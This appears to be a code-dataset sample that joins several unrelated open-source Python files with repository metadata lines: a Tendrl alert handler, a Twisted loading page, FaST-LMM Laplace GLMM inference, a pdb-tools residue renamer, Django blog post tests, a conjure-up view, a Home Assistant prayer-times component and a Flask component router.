"tags": null,
"value": 31.97861830493573
}]},
"Settings": {
"conditions": [{
"evaluator": {
"params": [29],
"type": "gt"},
query": {
"model": {
"target" : "sumSeries(#A, #B).select metric",
"targetFull": "sumSeries(sumSeries(tendrl.clusters.
ab3b125e-4769-4071-a349-e82b380c11f4.nodes.
{host_name}.cpu.percent-system),
sumSeries(tendrl.clusters.ab3b125e-4769-4071-a349-e82b
380c11f4.nodes.{host_name}.cpu.
percent-user)).select metric"
}
}
}]
}
}
"""
alert = {}
alert['tags'] = {}
alert['current_value'] = utils.find_current_value(
alert_json['EvalData'])
target = utils.find_alert_target(
alert_json['Settings']['conditions'])
alert['tags']['warning_max'] = utils.find_warning_max(
alert_json['Settings']['conditions'][0]['evaluator']['params'])
# identifying cluster_id and node_id from target
# Cpu target is an aggregation, So spliting and giving [0]
# Because both have same cluster and node ids
result = utils.parse_target(target, self.template)
alert['tags']['integration_id'] = result["cluster_id"]
alert["tags"]["fqdn"] = result["host_name"].replace("_", ".")
return alert
| rishubhjain/monitoring-integration | tendrl/monitoring_integration/alert/handlers/node/cpu_handler.py | Python | lgpl-2.1 | 5,352 |
#
# Copyright (c) 2014 ThoughtWorks, Inc.
#
# Pixelated is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Pixelated is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with Pixelated. If not, see <http://www.gnu.org/licenses/>.
import os
from twisted.internet.threads import deferToThread
from twisted.web.resource import Resource
from twisted.web.server import NOT_DONE_YET
from twisted.web.static import File
class LoadingResource(Resource):
def __init__(self):
Resource.__init__(self)
self._path = os.path.dirname(os.path.abspath(__file__))
self.putChild('assets', File(os.path.join(self._path, '..', 'assets')))
def render_GET(self, request):
def open_html():
return open(os.path.join(self._path, '..', 'assets', 'Interstitial.html')).read()
def close_request(html):
request.responseHeaders.addRawHeader("Connection", "close")
request.write(html)
request.finish()
d = deferToThread(open_html)
d.addCallback(close_request)
return NOT_DONE_YET
def getChild(self, path, request):
if path == '':
return self
return Resource.getChild(self, path, request)
| alabeduarte/pixelated-user-agent | service/pixelated/resources/loading_page.py | Python | agpl-3.0 | 1,677 |
from fastlmm import Pr
import scipy as sp
import numpy as NP
from numpy import dot
import scipy.integrate
from scipy.linalg import cholesky,solve_triangular
from fastlmm.external.util.math import check_definite_positiveness,check_symmetry,mvnormpdf,ddot,trace2,dotd
from fastlmm.external.util.math import stl, stu
from fastlmm.inference.glmm import GLMM_N1K3, GLMM_N3K1
from fastlmm.inference.likelihood import LogitLikelihood, ProbitLikelihood
import sys
'''
Important! Always run test.py in the current folder for unit testing after
changes have been made.
'''
class DebugUACall(object):
def __init__(self, innerIters, lastGrad, success, beta, sig02, sig12, sign2):
self.innerIters = innerIters
self.lastGrad = lastGrad
self.success = success
self.beta = beta
self.sig02 = sig02
self.sig12 = sig12
self.sign2 = sign2
class LaplaceGLMM(object):
def __init__(self, link):
self._lasta = None
self._debugUACalls = []
self._link = link
if link == "logistic":
self._likelihood = LogitLikelihood()
elif link == "erf":
self._likelihood = ProbitLikelihood()
else:
assert False, "Unknown link function."
def _calculateW(self, f):
W = -self._likelihood.hessian_log(f)
return W
def _lineSearch(self, a, aprev, m):
da = a - aprev
def fobj(alpha):
a = aprev + alpha*da
f = self._rdotK(a) + m
return -(self._likelihood.log(f, self._y) - (f-m).dot(a)/2.0)
(alpha,obj,iter,funcalls) = sp.optimize.brent(fobj, brack=(0.0,1.0), full_output=True, tol=1e-4, maxiter=10)
obj = -obj
a = aprev + alpha*da
f = self._rdotK(a) + m
return (f, a, obj)
def _calculateUAGrad(self, f, a):
grad = self._likelihood.gradient_log(f, self._y) - a
return grad
def printDebug(self):
assert self._debug is True
from tabulate import tabulate
iters = [self._debugUACalls[i].innerIters for i in range(len(self._debugUACalls))]
sig02 = [self._debugUACalls[i].sig02 for i in range(len(self._debugUACalls))]
sig12 = [self._debugUACalls[i].sig12 for i in range(len(self._debugUACalls))]
sign2 = [self._debugUACalls[i].sign2 for i in range(len(self._debugUACalls))]
gradMeans = [NP.mean(abs(self._debugUACalls[i].lastGrad)) for i in range(len(self._debugUACalls))]
Pr.prin("*** Update approximation ***")
Pr.prin("calls: %d" % (len(self._debugUACalls),))
table = [["", "min", "max", "mean"],
["iters", min(iters), max(iters), NP.mean(iters)],
["|grad|_{mean}", min(gradMeans), max(gradMeans), NP.mean(gradMeans)],
["sig01", min(sig02), max(sig02), NP.mean(sig02)],
["sig11", min(sig12), max(sig12), NP.mean(sig12)],
["sign1", min(sign2), max(sign2), NP.mean(sign2)]]
Pr.prin(tabulate(table))
def _updateApproximation(self):
'''
Calculates the Laplace approximation for the posterior.
It can be defined by two variables: f mode and W at f mode.
'''
if self._updateApproximationCount == 0:
return
if self._is_kernel_zero():
self._updateApproximationCount = 0
return
self._updateApproximationBegin()
gradEpsStop = 1e-10
objEpsStop = 1e-8
gradEpsErr = 1e-3
self._mean = self._calculateMean()
m = self._mean
if self._lasta is None or self._lasta.shape[0] != self._N:
aprev = NP.zeros(self._N)
else:
aprev = self._lasta
fprev = self._rdotK(aprev) + m
objprev = self._likelihood.log(fprev, self._y) - (fprev-m).dot(aprev)/2.0
ii = 0
line_search = False
maxIter = 1000
failed = False
failedMsg = ''
while ii < maxIter:
grad = self._calculateUAGrad(fprev, aprev)
if NP.mean(abs(grad)) < gradEpsStop:
a = aprev
f = fprev
break
# The following is just a Newton step (eq. (3.18) [1]) to maximize
# log(p(F|X,y)) over F
g = self._likelihood.gradient_log(fprev, self._y)
W = self._calculateW(fprev)
b = W*(fprev-m) + g
a = self._calculateUAa(b, W)
if line_search:
(f, a, obj) = self._lineSearch(a, aprev, m)
else:
f = self._rdotK(a) + m
obj = self._likelihood.log(f, self._y) - (f-m).dot(a)/2.0
if abs(objprev-obj) < objEpsStop :
grad = self._calculateUAGrad(f, a)
break
if obj > objprev:
fprev = f
objprev = obj
aprev = a
else:
if line_search:
grad = self._calculateUAGrad(fprev, aprev)
a = aprev
f = fprev
break
line_search = True
ii+=1
self._lasta = a
err = NP.mean(abs(grad))
if err > gradEpsErr:
failed = True
failedMsg = 'Gradient not too small in the Laplace update approximation.\n'
failedMsg = failedMsg+"Problem in the f mode estimation. |grad|_{mean} = %.6f." % (err,)
if ii>=maxIter:
failed = True
failedMsg = 'Laplace update approximation did not converge in less than maxIter.'
if self._debug:
self._debugUACalls.append(self.DebugUACall(
ii, grad, not failed, self.beta, self._sig02, self._sig12, self._sign2))
if failed:
Pr.prin('Laplace update approximation failed. The failure message is the following.')
Pr.prin(failedMsg)
sys.exit('Stopping program.')
self._updateApproximationEnd(f, a)
self._updateApproximationCount = 0
def _predict(self, meanstar, kstar, kstarstar, prob):
self._updateConstants()
self._updateApproximation()
if NP.isscalar(kstarstar):
return self._predict_each(meanstar, kstar, kstarstar, prob)
n = len(kstarstar)
ps = NP.zeros(n)
for i in xrange(n):
ps[i] = self._predict_each(meanstar[i], kstar[i,:], kstarstar[i], prob)
return ps
class LaplaceGLMM_N1K3(GLMM_N1K3, LaplaceGLMM):
def __init__(self, link, penalty=None, penalizeBias=False, debug=False):
GLMM_N1K3.__init__(self, penalty=penalty, penalizeBias=penalizeBias, debug=debug)
LaplaceGLMM.__init__(self, link)
self._link = link
def _updateApproximationBegin(self):
self._G01 = self._calculateG01()
def _calculateUAa(self, b, W):
A = 1.0 + W*self._sign2
V = W/A
Lk = self._calculateLk(self._G01, V)
Gtb = dot(self._G01.T, b)
GtV = ddot(self._G01.T, V, left=False)
LtLGtV = stu(Lk.T, stl(Lk, GtV))
LtLGtVG = dot(LtLGtV, self._G01)
bn = self._sign2*b
a = b + dot(dot(GtV.T, LtLGtVG) - GtV.T, Gtb)\
+ dot(GtV.T, dot(LtLGtV, bn)) - V*bn
return a
def _updateApproximationEnd(self, f, a):
self._f = f
self._a = a
self._W = self._calculateW(f)
self._Wsq = NP.sqrt(self._W)
self._A = 1.0 + self._W * self._sign2
self._V = self._W/self._A
self._Lk = self._calculateLk(self._G01, self._V)
def _updateApproximation(self):
LaplaceGLMM._updateApproximation(self)
def _regular_marginal_loglikelihood(self):
self._updateConstants()
self._updateApproximation()
if self._is_kernel_zero():
return self._likelihood.log(self._mean, self._y)
(f,a) = (self._f,self._a)
loglike = self._likelihood.log(f, self._y)
r = loglike - dot(f-self._mean,a)/2.0 - sum(NP.log(NP.diag(self._Lk)))\
- sum(NP.log( self._A ))/2.0
assert NP.isfinite(r), 'Not finite regular marginal loglikelihood.'
return r
def _rmll_gradient(self, optSig02=True, optSig12=True, optSign2=True, optBeta=True):
self._updateConstants()
self._updateApproximation()
(f,a)=(self._f,self._a)
(W,Wsq) = (self._W,self._Wsq)
Lk = self._Lk
m = self._mean
X = self._X
G0 = self._G0
G1 = self._G1
sign2 = self._sign2
G01 = self._G01
#g = self._likelihood.gradient_log(f)
#a==g
h = self._likelihood.third_derivative_log(f)
V = W/self._A
d = self._dKn()
G01tV = ddot(G01.T, V, left=False)
H = stl(Lk, G01tV)
dkH = self._ldotK(H)
diags = (d - sign2**2 * V - dotd(G01, dot(dot(G01tV, G01), G01.T))\
- 2.0*sign2*dotd(G01, G01tV) + dotd(dkH.T, dkH)) * h
ret = []
if optSig02:
dK0a = dot(G0, dot(G0.T, a))
t = V*dK0a - dot(H.T, dot(H, dK0a))
dF0 = dK0a - self._rdotK(t)
LkG01VG0 = dot(H, G0)
VG0 = ddot(V, G0, left=True)
ret0 = dot(a, dF0) - 0.5*dot(a, dK0a) + dot(f-m, t)\
+ 0.5*NP.sum( diags*dF0 )\
+ -0.5*trace2(VG0, G0.T) + 0.5*trace2( LkG01VG0.T, LkG01VG0 )
ret.append(ret0)
if optSig12:
dK1a = dot(G1, dot(G1.T, a))
t = V*dK1a - dot(H.T, dot(H, dK1a))
dF1 = dK1a - self._rdotK(t)
LkG01VG1 = dot(H, G1)
VG1 = ddot(V, G1, left=True)
ret1 = dot(a, dF1)- 0.5*dot(a, dK1a) + dot(f-m, t)\
+ 0.5*NP.sum( diags*dF1 )\
+ -0.5*trace2(VG1, G1.T) + 0.5*trace2( LkG01VG1.T, LkG01VG1 )
ret.append(ret1)
if optSign2:
t = V*a - dot(H.T, dot(H, a))
dFn = a - self._rdotK(t)
retn = dot(a, dFn)- 0.5*dot(a, a) + dot(f-m, t)\
+ 0.5*NP.sum( diags*dFn )\
+ -0.5*NP.sum(V) + 0.5*trace2( H.T, H )
ret.append(retn)
if optBeta:
t = ddot(V, X, left=True) - dot(H.T, dot(H, X))
dFbeta = X - self._rdotK(t)
retbeta = dot(a, dFbeta) + dot(f-m, t)
for i in range(dFbeta.shape[1]):
retbeta[i] += 0.5*NP.sum( diags*dFbeta[:,i] )
ret.extend(retbeta)
ret = NP.array(ret)
assert NP.all(NP.isfinite(ret)), 'Not finite regular marginal loglikelihood gradient.'
return ret
def _predict(self, meanstar, kstar, kstarstar, prob):
return LaplaceGLMM._predict(self, meanstar, kstar, kstarstar, prob)
def _predict_each(self, meanstar, kstar, xstarstar, prob):
'''
Calculates the probability of being 1, or the most probable label
if prob=False.
--------------------------------------------------------------------------
Input:
meanstar : input mean.
kstar : covariance between provided and prior latent variables.
xstarstar : variance of the latent variable.
prob : True for probability calculation or False for returning
the most probable label.
'''
a = self._a
fstarmean = meanstar + kstar.dot(a)
if prob is False:
if fstarmean > 0.0:
return +1.0
return -1.0
r0Tr0 = kstar.dot(self._V*kstar)
r1 = stl(self._Lk, dot(self._G01.T, self._V*kstar))
fstarvar = xstarstar - r0Tr0 + r1.dot(r1)
return self._likelihood.intOverGauss(fstarmean, fstarvar)
class LaplaceGLMM_N3K1(GLMM_N3K1, LaplaceGLMM):
def __init__(self, link, penalty=None, penalizeBias=False, debug=False):
GLMM_N3K1.__init__(self, penalty=penalty, penalizeBias=penalizeBias, debug=debug)
LaplaceGLMM.__init__(self, link)
self._link = link
def _updateApproximationBegin(self):
self._K = NP.eye(self._N) * self._sign2
if self._isK0Set:
self._K += self._sig02*(dot(self._G0, self._G0.T))
if self._isK1Set:
self._K += self._sig12*(dot(self._G1, self._G1.T))
def _calculateUAa(self, b, W):
Wsq = NP.sqrt(W)
Ln = self._calculateLn(self._K, Wsq)
a = b - Wsq * stu(Ln.T, stl(Ln, Wsq*dot(self._K,b)))
return a
def _updateApproximationEnd(self, f, a):
self._f = f
self._a = a
self._W = self._calculateW(f)
self._Wsq = NP.sqrt(self._W)
self._A = 1.0 + self._W * self._sign2
V = self._W/self._A
self._Ln = self._calculateLn(self._K, self._Wsq)
def _regular_marginal_loglikelihood(self):
self._updateConstants()
self._updateApproximation()
if self._is_kernel_zero():
return self._likelihood.log(self._mean, self._y)
(f,a) = (self._f,self._a)
loglike = self._likelihood.log(f, self._y)
r = loglike - dot(f-self._mean,a)/2.0 - sum(NP.log(NP.diag(self._Ln)))
assert NP.isfinite(r), 'Not finite regular marginal loglikelihood.'
return r
def _rmll_gradient(self, optSig02=True, optSig12=True, optSign2=True, optBeta=True):
self._updateConstants()
self._updateApproximation()
W = self._W
Wsq = self._Wsq
f = self._f
K = self._K
K0 = self._K0
K1 = self._K1
m = self._mean
a = self._a
Ln = self._Ln
X = self._X
LnWsq = stl(Ln, NP.diag(Wsq))
LnWsqK = dot(LnWsq, K)
d = self._dKn()
h = self._likelihood.third_derivative_log(f)
diags = (d - dotd(LnWsqK.T, LnWsqK)) * h
ret = []
if optSig02:
dK0a = dot(K0, a)
dF0 = dK0a - dot(LnWsqK.T, dot(LnWsq, dK0a))
r = dot(a, dF0) - dot(a, dF0) + 0.5*dot(a, dK0a)\
+ 0.5*NP.sum( diags*dF0 )\
- 0.5*trace2( LnWsq.T, dot(LnWsq,K0) )
ret.append(r)
if optSig12:
dK1a = dot(K1, a)
dF1 = dK1a - dot(LnWsqK.T, dot(LnWsq, dK1a))
r = dot(a, dF1) - dot(a, dF1) + 0.5*dot(a, dK1a)\
+ 0.5*NP.sum( diags*dF1 )\
- 0.5*trace2( LnWsq.T, dot(LnWsq,K1) )
ret.append(r)
if optSign2:
dFn = a - dot(LnWsqK.T, dot(LnWsq, a))
r = dot(a, dFn) - dot(a, dFn) + 0.5*dot(a, a)\
+ 0.5*NP.sum( diags*dFn )\
- 0.5*trace2( LnWsq.T, LnWsq )
ret.append(r)
if optBeta:
dFmb = -dot(LnWsqK.T, dot(LnWsq, X))
dFb = dFmb+X
r = dot(a, dFb) - dot(a, dFmb)\
+ 0.5*NP.sum( diags*dFb.T, 1)
ret += list(r)
ret = NP.array(ret)
assert NP.all(NP.isfinite(ret)), 'Not finite regular marginal loglikelihood gradient.'
return ret
def _updateApproximation(self):
LaplaceGLMM._updateApproximation(self)
def _predict(self, meanstar, kstar, kstarstar, prob):
return LaplaceGLMM._predict(self, meanstar, kstar, kstarstar, prob)
def _predict_each(self, meanstar, kstar, xstarstar, prob):
'''
Calculates the probability of being 1, or the most probable label
if prob=False.
--------------------------------------------------------------------------
Input:
meanstar : input mean.
kstar : covariance between provided and prior latent variables.
xstarstar : variance of the latent variable.
prob : True for probability calculation or False for returning
the most probable label.
'''
fstarmean = meanstar + kstar.dot(self._a)
if prob is False:
if fstarmean > 0.0:
return +1.0
return -1.0
r = stl(self._Ln, self._Wsq*kstar)
fstarvar = xstarstar - dot(r,r)
return self._likelihood.intOverGauss(fstarmean, fstarvar)
| MicrosoftGenomics/FaST-LMM | fastlmm/inference/laplace.py | Python | apache-2.0 | 16,247 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright 2018 João Pedro Rodrigues
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Performs in-place replacement of a residue name by another.
Affects all residues with that name.
Usage:
python pdb_rplresname.py -<from>:<to> <pdb file>
Example:
python pdb_rplresname.py -HIP:HIS 1CTF.pdb # changes all HIP residues to HIS
This program is part of the `pdb-tools` suite of utilities and should not be
distributed isolatedly. The `pdb-tools` were created to quickly manipulate PDB
files using the terminal, and can be used sequentially, with one tool streaming
data to another. They are based on old FORTRAN77 code that was taking too much
effort to maintain and compile. RIP.
"""
import os
import sys
__author__ = ["Joao Rodrigues", "Joao M.C. Teixeira"]
__email__ = ["j.p.g.l.m.rodrigues@gmail.com", "joaomcteixeira@gmail.com"]
def check_input(args):
"""Checks whether to read from stdin/file and validates user input/options.
"""
# Defaults
option = ''
fh = sys.stdin # file handle
if len(args) == 1:
# option & Pipe
if args[0].startswith('-'):
option = args[0][1:]
if sys.stdin.isatty(): # ensure the PDB data is streamed in
emsg = 'ERROR!! No data to process!\n'
sys.stderr.write(emsg)
sys.stderr.write(__doc__)
sys.exit(1)
else:
emsg = 'ERROR!! Option not valid: \'{}\'\n'
sys.stderr.write(emsg.format(args[0]))
sys.stderr.write(__doc__)
sys.exit(1)
elif len(args) == 2:
# Two options: option & File
if not args[0].startswith('-'):
emsg = 'ERROR! First argument is not an option: \'{}\'\n'
sys.stderr.write(emsg.format(args[0]))
sys.stderr.write(__doc__)
sys.exit(1)
if not os.path.isfile(args[1]):
emsg = 'ERROR!! File not found or not readable: \'{}\'\n'
sys.stderr.write(emsg.format(args[1]))
sys.stderr.write(__doc__)
sys.exit(1)
option = args[0][1:]
fh = open(args[1], 'r')
else: # Whatever ...
sys.stderr.write(__doc__)
sys.exit(1)
# Validate option
if option.count(':') != 1 and len(option.split(':')) != 2:
emsg = 'ERROR!! Invalid option value: \'{}\'\n'
sys.stderr.write(emsg.format(option))
sys.exit(1)
name_from, name_to = option.split(':')
if not (1 <= len(name_from) <= 3):
emsg = 'ERROR!! Residue names must have one to three characters: \'{}\''
sys.stderr.write(emsg.format(name_from))
sys.exit(1)
if not (1 <= len(name_to) <= 3):
emsg = 'ERROR!! Residue names must have one to three characters: \'{}\''
sys.stderr.write(emsg.format(name_to))
sys.exit(1)
return (name_from, name_to, fh)
def rename_residues(fhandle, name_from, name_to):
"""Changes the residue name of residues matching a pattern to another.
"""
records = ('ATOM', 'HETATM', 'TER', 'ANISOU')
for line in fhandle:
if line.startswith(records):
line_resname = line[17:20].strip()
if line_resname == name_from:
yield line[:17] + name_to.rjust(3) + line[20:]
continue
yield line
def main():
# Check Input
name_from, name_to, pdbfh = check_input(sys.argv[1:])
# Do the job
new_pdb = rename_residues(pdbfh, name_from, name_to)
# Output results
try:
_buffer = []
_buffer_size = 5000 # write N lines at a time
for lineno, line in enumerate(new_pdb):
if not (lineno % _buffer_size):
sys.stdout.write(''.join(_buffer))
_buffer = []
_buffer.append(line)
sys.stdout.write(''.join(_buffer))
sys.stdout.flush()
except IOError:
# This is here to catch Broken Pipes
# for example to use 'head' or 'tail' without
# the error message showing up
pass
# last line of the script
# Close file handle even if it is sys.stdin, no problem here.
pdbfh.close()
sys.exit(0)
if __name__ == '__main__':
main()
| JoaoRodrigues/pdb-tools | pdbtools/pdb_rplresname.py | Python | apache-2.0 | 4,763 |
from django.test import TestCase
from judge.models.tests.util import CommonDataMixin, create_blogpost, create_user
class BlogPostTestCase(CommonDataMixin, TestCase):
@classmethod
def setUpTestData(self):
super().setUpTestData()
self.users.update({
'staff_blogpost_edit_own': create_user(
username='staff_blogpost_edit_own',
is_staff=True,
user_permissions=('change_blogpost',),
),
'staff_blogpost_edit_all': create_user(
username='staff_blogpost_edit_all',
is_staff=True,
user_permissions=('change_blogpost', 'edit_all_post'),
),
})
self.basic_blogpost = create_blogpost(
title='basic',
authors=('staff_blogpost_edit_own',),
)
self.visible_blogpost = create_blogpost(
title='visible',
visible=True,
)
def test_basic_blogpost(self):
self.assertEqual(str(self.basic_blogpost), self.basic_blogpost.title)
def test_basic_blogpost_methods(self):
data = {
'superuser': {
'can_see': self.assertTrue,
'is_editable_by': self.assertTrue,
},
'staff_blogpost_edit_own': {
'can_see': self.assertTrue,
'is_editable_by': self.assertTrue,
},
'staff_blogpost_edit_all': {
'can_see': self.assertTrue,
'is_editable_by': self.assertTrue,
},
'normal': {
'can_see': self.assertFalse,
'is_editable_by': self.assertFalse,
},
'anonymous': {
'can_see': self.assertFalse,
'is_editable_by': self.assertFalse,
},
}
self._test_object_methods_with_users(self.basic_blogpost, data)
def test_visible_blogpost_methods(self):
data = {
'superuser': {
'can_see': self.assertTrue,
'is_editable_by': self.assertTrue,
},
'staff_blogpost_edit_own': {
'can_see': self.assertTrue,
'is_editable_by': self.assertFalse,
},
'normal': {
'can_see': self.assertTrue,
'is_editable_by': self.assertFalse,
},
'anonymous': {
'can_see': self.assertTrue,
'is_editable_by': self.assertFalse,
},
}
self._test_object_methods_with_users(self.visible_blogpost, data)
| DMOJ/site | judge/models/tests/test_blogpost.py | Python | agpl-3.0 | 2,642 |
from __future__ import unicode_literals
from ubuntui.ev import EventLoop
from ubuntui.utils import Color, Padding
from ubuntui.widgets.buttons import menu_btn, quit_btn
from urwid import Columns, Filler, Pile, Text, WidgetWrap
from conjureup.app_config import app
class VariantView(WidgetWrap):
def __init__(self, cb):
self.cb = cb
self.fname_id_map = {}
self.current_focus = 2
_pile = [
Padding.line_break(""),
Padding.center_90(self.build_menuable_items()),
Padding.line_break(""),
Padding.center_20(self.buttons())
]
super().__init__(Filler(Pile(_pile), valign="top"))
def _swap_focus(self):
if self._w.body.focus_position == 2:
self._w.body.focus_position = 4
else:
self._w.body.focus_position = 2
def keypress(self, size, key):
if key in ['tab', 'shift tab']:
self._swap_focus()
return super().keypress(size, key)
def buttons(self):
cancel = quit_btn(on_press=self.cancel)
buttons = [
Color.button_secondary(cancel, focus_map='button_secondary focus')
]
return Pile(buttons)
def build_menuable_items(self):
""" Builds a list of bundles available to install
"""
cols = []
for bundle in app.bundles:
bundle_metadata = bundle['Meta']['bundle-metadata']
try:
conjure_data = bundle['Meta']['extra-info/conjure-up']
name = conjure_data.get('friendly-name',
bundle['Meta']['id']['Name'])
except KeyError:
name = bundle['Meta']['id']['Name']
self.fname_id_map[name] = bundle
cols.append(
Columns(
[
("weight", 0.2, Color.body(
menu_btn(label=name,
on_press=self.done),
focus_map="menu_button focus")),
("weight", 0.3, Text(
bundle_metadata.get('Description',
'Needs a description'),
align="left"))
],
dividechars=1
)
)
cols.append(Padding.line_break(""))
return Pile(cols)
def cancel(self, button):
EventLoop.exit(0)
def done(self, result):
self.cb(self.fname_id_map[result.label])
| conjure-up/conjure-up | conjureup/ui/views/variant.py | Python | mit | 2,592 |
"""The islamic_prayer_times component."""
from datetime import timedelta
import logging
from prayer_times_calculator import PrayerTimesCalculator, exceptions
from requests.exceptions import ConnectionError as ConnError
import voluptuous as vol
from homeassistant.config_entries import SOURCE_IMPORT
from homeassistant.exceptions import ConfigEntryNotReady
from homeassistant.helpers.dispatcher import async_dispatcher_send
from homeassistant.helpers.event import async_call_later, async_track_point_in_time
import homeassistant.util.dt as dt_util
from .const import (
CALC_METHODS,
CONF_CALC_METHOD,
DATA_UPDATED,
DEFAULT_CALC_METHOD,
DOMAIN,
)
_LOGGER = logging.getLogger(__name__)
CONFIG_SCHEMA = vol.Schema(
{
DOMAIN: {
vol.Optional(CONF_CALC_METHOD, default=DEFAULT_CALC_METHOD): vol.In(
CALC_METHODS
),
}
},
extra=vol.ALLOW_EXTRA,
)
async def async_setup(hass, config):
"""Import the Islamic Prayer component from config."""
if DOMAIN in config:
hass.async_create_task(
hass.config_entries.flow.async_init(
DOMAIN, context={"source": SOURCE_IMPORT}, data=config[DOMAIN]
)
)
return True
async def async_setup_entry(hass, config_entry):
"""Set up the Islamic Prayer Component."""
client = IslamicPrayerClient(hass, config_entry)
if not await client.async_setup():
return False
hass.data.setdefault(DOMAIN, client)
return True
async def async_unload_entry(hass, config_entry):
"""Unload Islamic Prayer entry from config_entry."""
if hass.data[DOMAIN].event_unsub:
hass.data[DOMAIN].event_unsub()
hass.data.pop(DOMAIN)
await hass.config_entries.async_forward_entry_unload(config_entry, "sensor")
return True
class IslamicPrayerClient:
"""Islamic Prayer Client Object."""
def __init__(self, hass, config_entry):
"""Initialize the Islamic Prayer client."""
self.hass = hass
self.config_entry = config_entry
self.prayer_times_info = {}
self.available = True
self.event_unsub = None
@property
def calc_method(self):
"""Return the calculation method."""
return self.config_entry.options[CONF_CALC_METHOD]
def get_new_prayer_times(self):
"""Fetch prayer times for today."""
calc = PrayerTimesCalculator(
latitude=self.hass.config.latitude,
longitude=self.hass.config.longitude,
calculation_method=self.calc_method,
date=str(dt_util.now().date()),
)
return calc.fetch_prayer_times()
async def async_schedule_future_update(self):
"""Schedule future update for sensors.
Midnight is a calculated time. The specifics of the calculation
depends on the method of the prayer time calculation. This calculated
midnight is the time at which the time to pray the Isha prayers have
expired.
Calculated Midnight: The Islamic midnight.
Traditional Midnight: 12:00AM
Update logic for prayer times:
If the Calculated Midnight is before the traditional midnight then wait
until the traditional midnight to run the update. This way the day
will have changed over and we don't need to do any fancy calculations.
If the Calculated Midnight is after the traditional midnight, then wait
until after the calculated Midnight. We don't want to update the prayer
times too early or else the timings might be incorrect.
Example:
calculated midnight = 11:23PM (before traditional midnight)
Update time: 12:00AM
calculated midnight = 1:35AM (after traditional midnight)
update time: 1:36AM.
"""
_LOGGER.debug("Scheduling next update for Islamic prayer times")
now = dt_util.utcnow()
midnight_dt = self.prayer_times_info["Midnight"]
if now > dt_util.as_utc(midnight_dt):
next_update_at = midnight_dt + timedelta(days=1, minutes=1)
_LOGGER.debug(
"Midnight is after day the changes so schedule update for after Midnight the next day"
)
else:
_LOGGER.debug(
"Midnight is before the day changes so schedule update for the next start of day"
)
next_update_at = dt_util.start_of_local_day(now + timedelta(days=1))
_LOGGER.info("Next update scheduled for: %s", next_update_at)
self.event_unsub = async_track_point_in_time(
self.hass, self.async_update, next_update_at
)
async def async_update(self, *_):
"""Update sensors with new prayer times."""
try:
prayer_times = await self.hass.async_add_executor_job(
self.get_new_prayer_times
)
self.available = True
except (exceptions.InvalidResponseError, ConnError):
self.available = False
_LOGGER.debug("Error retrieving prayer times.")
async_call_later(self.hass, 60, self.async_update)
return
for prayer, time in prayer_times.items():
self.prayer_times_info[prayer] = dt_util.parse_datetime(
f"{dt_util.now().date()} {time}"
)
await self.async_schedule_future_update()
_LOGGER.debug("New prayer times retrieved. Updating sensors.")
async_dispatcher_send(self.hass, DATA_UPDATED)
async def async_setup(self):
"""Set up the Islamic prayer client."""
await self.async_add_options()
try:
await self.hass.async_add_executor_job(self.get_new_prayer_times)
except (exceptions.InvalidResponseError, ConnError):
raise ConfigEntryNotReady
await self.async_update()
self.config_entry.add_update_listener(self.async_options_updated)
self.hass.async_create_task(
self.hass.config_entries.async_forward_entry_setup(
self.config_entry, "sensor"
)
)
return True
async def async_add_options(self):
"""Add options for entry."""
if not self.config_entry.options:
data = dict(self.config_entry.data)
calc_method = data.pop(CONF_CALC_METHOD, DEFAULT_CALC_METHOD)
self.hass.config_entries.async_update_entry(
self.config_entry, data=data, options={CONF_CALC_METHOD: calc_method}
)
@staticmethod
async def async_options_updated(hass, entry):
"""Triggered by config entry options updates."""
if hass.data[DOMAIN].event_unsub:
hass.data[DOMAIN].event_unsub()
await hass.data[DOMAIN].async_update()
| nkgilley/home-assistant | homeassistant/components/islamic_prayer_times/__init__.py | Python | apache-2.0 | 6,817 |
from flask import render_template, request, url_for, jsonify
from application.mongo_db import mongo
from bson.objectid import ObjectId
from . import module
from . import validation
from .setup import setup
@module.route("/<component_type>/", methods=("GET", "POST"))
def index(component_type):
kwargs = {}
if validation.validate_type(component_type):
kwargs["dependencies"] = setup(component_type)
return render_template("components/%s.html" % component_type, **kwargs)
else:
return "", 404
@module.route("/<component_type>/filter", methods=("POST",))
def filter_components(component_type):
if validation.validate_type(component_type):
result = list(
mongo.db.components.find({
"group_id": ObjectId(request.form.get("group_id"))
})
)
return jsonify(result)
else:
return jsonify({}), 404
@module.route("/<component_type>/add", methods=("POST",))
def add(component_type):
if validation.validate_type(component_type):
data = {"type": component_type}
for item in request.form:
if item != "ajax" and item != 'id':
data[item] = request.form[item]
cid = mongo.db.components.insert_one(data).inserted_id
if "image" in data:
return jsonify(
{"id": str(cid), "image": url_for("file_upload.get", name=data["image"])},
)
else:
return jsonify(
{"id": str(cid)}
)
else:
return jsonify({}), 404
@module.route("/<component_type>/remove", methods=("POST",))
def remove(component_type):
if validation.validate_type(component_type):
mongo.db.components.remove({
"_id": ObjectId(request.form.get("id"))
})
return jsonify({})
else:
return jsonify({}), 404
@module.route("/<component_type>/update", methods=("POST",))
def update(component_type):
if validation.validate_type(component_type):
data = {"type": component_type}
for item in request.form:
if item == "ajax":
continue
if item != 'id' and request.form.get(item) != '':
data[item] = request.form.get(item)
oid = request.form.get("id")
mongo.db.components.update(
{
"_id": ObjectId(oid)
},
{
"$set": data
}
)
if "image" in data:
src = u""+url_for("file_upload.get", name=data["image"])
return jsonify({"image": src})
return jsonify({})
else:
return jsonify({}), 404
| megrela/flask-cms-control-panel | application/modules/components/router.py | Python | mit | 2,677 |
# Copyright (c) 2010 OpenStack Foundation
# Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
